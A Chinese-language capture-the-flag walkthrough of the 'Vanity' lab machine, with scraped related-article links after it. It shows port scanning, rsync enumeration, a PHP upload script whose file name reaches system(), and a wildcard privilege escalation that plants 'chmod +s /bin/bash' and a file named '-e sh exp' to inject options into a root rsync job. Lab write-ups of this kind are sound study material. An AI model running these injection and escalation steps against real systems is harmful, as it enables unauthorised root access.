nmap扫描 
┌──(root㉿kali)-[~]

└─# nmap -p- -A 192.168.167.234

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 03:59 UTC

Stats: 0:01:22 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute

Traceroute Timing: About 32.26% done; ETC: 04:00 (0:00:00 remaining)

Nmap scan report for 192.168.167.234

Host is up (0.072s latency).

Not shown: 65532 closed tcp ports (reset)

PORT    STATE SERVICE VERSION

22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)

|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)

|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)

80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))

|_http-title: Vanity Virus Scanner

|_http-server-header: Apache/2.4.41 (Ubuntu)

873/tcp open  rsync   (protocol version 31)

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.94SVN%E=4%D=11/9%OT=22%CT=1%CU=43814%PV=Y%DS=4%DC=T%G=Y%TM=672E

OS:DE5A%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%II=I%TS=A)OPS(O

OS:1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11N

OS:W7%O6=M551ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R

OS:=Y%DF=Y%T=40%W=FAF0%O=M551NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%

OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%

OS:Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK

OS:=9655%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)

HOP RTT      ADDRESS

1   69.74 ms 192.168.45.1

2   69.54 ms 192.168.45.254

3   71.50 ms 192.168.251.1

4   71.55 ms 192.168.167.234

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 84.89 seconds
rsync查看源码 
┌──(root㉿kali)-[~/lab]

└─# rsync  -rdt rsync://192.168.167.234

source          Web Source

backup          Virus Samples Backup

┌──(root㉿kali)-[~/lab]

└─# rsync  -rdt rsync://192.168.167.234/source

drwxr-xr-x          4,096 2022/10/25 11:31:36 .

-rw-r--r--          2,814 2022/10/25 11:31:36 index.html

-rw-r--r--            155 2022/10/25 11:31:36 style.css

drwxr-xr-x          4,096 2022/10/25 11:31:36 uploads

-rw-r--r--            738 2022/10/25 11:31:36 uploads/upload.php

┌──(root㉿kali)-[~/lab]

└─# rsync  -rdt rsync://192.168.167.234 ./rsyn_shared

source          Web Source

backup          Virus Samples Backup

┌──(root㉿kali)-[~/lab]

└─# ls

apache_2fa  pass

┌──(root㉿kali)-[~/lab]

└─# rsync  -rdt rsync://192.168.167.234/source

drwxr-xr-x          4,096 2022/10/25 11:31:36 .

-rw-r--r--          2,814 2022/10/25 11:31:36 index.html

-rw-r--r--            155 2022/10/25 11:31:36 style.css

drwxr-xr-x          4,096 2022/10/25 11:31:36 uploads

-rw-r--r--            738 2022/10/25 11:31:36 uploads/upload.php

┌──(root㉿kali)-[~/lab]

└─# rsync  -rdt rsync://192.168.167.234/source/uploads/upload.php

-rw-r--r--            738 2022/10/25 11:31:36 upload.php

┌──(root㉿kali)-[~/lab]

└─#  rsync  -av rsync://192.168.167.234/source/uploads/upload.php ./upload.php

receiving incremental file list

upload.php

sent 43 bytes  received 834 bytes  250.57 bytes/sec

total size is 738  speedup is 0.84

┌──(root㉿kali)-[~/lab]

└─# ls

apache_2fa  pass  upload.php

┌──(root㉿kali)-[~/lab]

└─# cat upload.php

<?php

        //Check if the file is well uploaded

        if($_FILES['file']['error'] > 0) { echo 'Error during uploading, try again'; }

        //Set up valid extension

        $extsNotAllowed = array( 'php','php7','php6','phar','phtml','phps','pht','phtm','pgif','shtml','htaccess','inc');

        $extUpload = strtolower( substr( strrchr($_FILES['file']['name'], '.') ,1) ) ;

        //Check if the uploaded file extension is allowed

        if (in_array($extUpload, $extsNotAllowed) ) {

        echo 'File not allowed'; 

        }

    else {

        $name = "{$_FILES['file']['name']}";

        $result = move_uploaded_file($_FILES['file']['tmp_name'], $name);

        if($result){

            system("/usr/bin/clamscan $name");

        }

    }

?>

发现命令执行漏洞getshell



pspy32发现会执行rsync命令定时任务,存在通配符提权

利用通配符提权 
www-data@vanity:/var/www/html/uploads$ rm *

www-data@vanity:/var/www/html/uploads$ echo "chmod +s /bin/bash" > exp

www-data@vanity:/var/www/html/uploads$ chmod 777 *

www-data@vanity:/var/www/html/uploads$ echo > '-e sh exp'

www-data@vanity:/var/www/html/uploads$ ls

Vanity Intermediate 统配符提权的更多相关文章

  1. 2018-2019-2 20165215《网络对抗技术》Exp10 Final Windows本地内核提权+Exploit-Exercises Nebula学习与实践

    目录 PART ONE :Windows本地内核提权 漏洞概述 漏洞原理 漏洞复现 windbg调试本地内核 查看SSDT表和SSDTShadow表 查看窗口站结构体信息 利用Poc验证漏洞 漏洞利用 ...

  2. udf提权方法和出现问题汇总

    一.适用条件 1.目标系统是Windows(Win2000,XP,Win2003): 2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数( ...

  3. 小白日记23:kali渗透测试之提权(三)--WCE、fgdump、mimikatz

    WCE windows身份认证过程 http://wenku.baidu.com/view/cf2ee127a5e9856a56126017.html #特例在登陆的目标服务器/系统,有一个w摘要安全 ...

  4. kali权限提升之配置不当提权与WCE

    kali权限提升之配置不当提权与WCE 1.利用配置不当提权 2.WCE 3.其他提权 一.利用配置不当提权 与漏洞提权相比更常用的方法 在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏 ...

  5. ECShop全系列版本远程代码执行高危漏洞分析+实战提权

    漏洞概述 ECShop的user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行.攻击者无需登录站点等操作,可以直接远程写入webshell,危害严重. 漏洞评级 ...

  6. 新Windows本地提权漏洞学习(CVE-2019-0841)

    1.这是一个啥漏洞? 睁眼一看,妈呀本地提权,快加入本地提权漏洞利用包里,速度加入.github连接我就不发了.担心被认为是传播黑客工具,咱们在这里单纯学习一下漏洞的原理和部分源代码. 2.文件读写权 ...

  7. Android内核sys_setresuid() Patch提权(CVE-2012-6422)

    让我们的Android ROOT,多一点套路. 一.简单套路 CVE-2012-6422的漏洞利用代码,展示了另一种提权方法.(见附录) 这也是一个mmap驱动接口校验导致映射任意内核地址的洞.将内核 ...

  8. 免考final linux提权与渗透入门——Exploit-Exercise Nebula学习与实践

    免考final linux提权与渗透入门--Exploit-Exercise Nebula学习与实践 0x0 前言 Exploit-Exercise是一系列学习linux下渗透的虚拟环境,官网是htt ...

  9. Linux组和提权

    目 录 第1章 组命名管理**    1 1.1 group组信息和密码信息    1 1.1.1 /etc/group 组账户信息    1 1.1.2 /etc/gshadow 组密码信息     ...

  10. 批处理&提权命令

    提权应用 批处理遍历webshell可访问目录 opendir.readdir.is_dir.is_writable这几个遍历文件夹的函数,在php限制的情况下,找可执行目录就没有优势了. @echo ...

随机推荐

  1. SPI接口,如何对W25Q64进行读写操作?深度解析

    ​ 一.SPI概述 SPI(SerialPeripheralInterface)是一种同步串行通信协议,广泛应用于微控制器和外围设备之间的数据传输.它由摩托罗拉公司开发,具有全双工通信能力,即可以同时 ...

  2. 从零开始学机器学习——K-Means 聚类

    首先给大家介绍一个很好用的学习地址:https://cloudstudio.net/columns 在上一章节中,我们重点探讨了聚类的可视化分析方法,帮助我们更好地理解数据之间的关系和结构.今天,我们 ...

  3. html face属性

    无意间发现邮件里面的字体非常像手写的,然后点击HTML源码发现,使用了这个face属性. 代码如下: <font face="comic sans ms">PS: 你看 ...

  4. 1.TP6的入门-安装

    打开官网,找到这里点击手册 或者直接访问 这里 可以看到TP6已经有了赞助商 然后往后面阅读,发现他推荐我们读这个 这个入门必读还是不错的,简单的看看就行 后面就开始安装吧 首先注意自己的环境php版 ...

  5. lua中table中null的表示方法以及判断redis返回null

    今天遇到一个麻烦的问题,查询redis时候,查到数据的时候正常返回,查询不到数据时,返回了null,然而在lua中,常见的nil,但不常见null,这时候lua中对redis返回的null如何做判断呢 ...

  6. Java并发显式锁和显式条件队列

    一 显式锁 在类中利用synchronized修饰的方法或者this代码块,均使用的是类的实例锁或者类的锁.这些锁都称为内置锁. 可以利用显式锁进行协调对象的访问.即ReentrantLock.这是一 ...

  7. PythonDay1Base

    PythonDay1Base 变量 即python运行过程中可以发生改变的量,如同数学中的未知数X,将一个确定的量赋值给变量. 变量定义原则 由英文大小写,数字以及下划线_组成 不能以数字开头 不能以 ...

  8. vue使用高德地图初始化坑

    使用的时候有时候会报除Amap没有定义之外的错如 TypeError: v.w.uh is not a constructor Uncaught TypeError: Cannot read prop ...

  9. hello鸿蒙

    1. 前言 鸿蒙是一款由华为推出的全生态操作系统(探索 | 华为开发者联盟),最近几年发展势头非常强劲,现在开始,让我们来一起认识他吧. 本文针对鸿蒙基本的开发内容做一次概览性的串联. 咱们学习一款新 ...

  10. 在 Ubuntu GUI 中以 root 身份登录

    参考:https://zhuanlan.zhihu.com/p/610049537?utm_id=0 有一些桌面用户想以 root 身份登录.这不是什么明智之举,但肯定是可以做到的. 默认情况下,Ub ...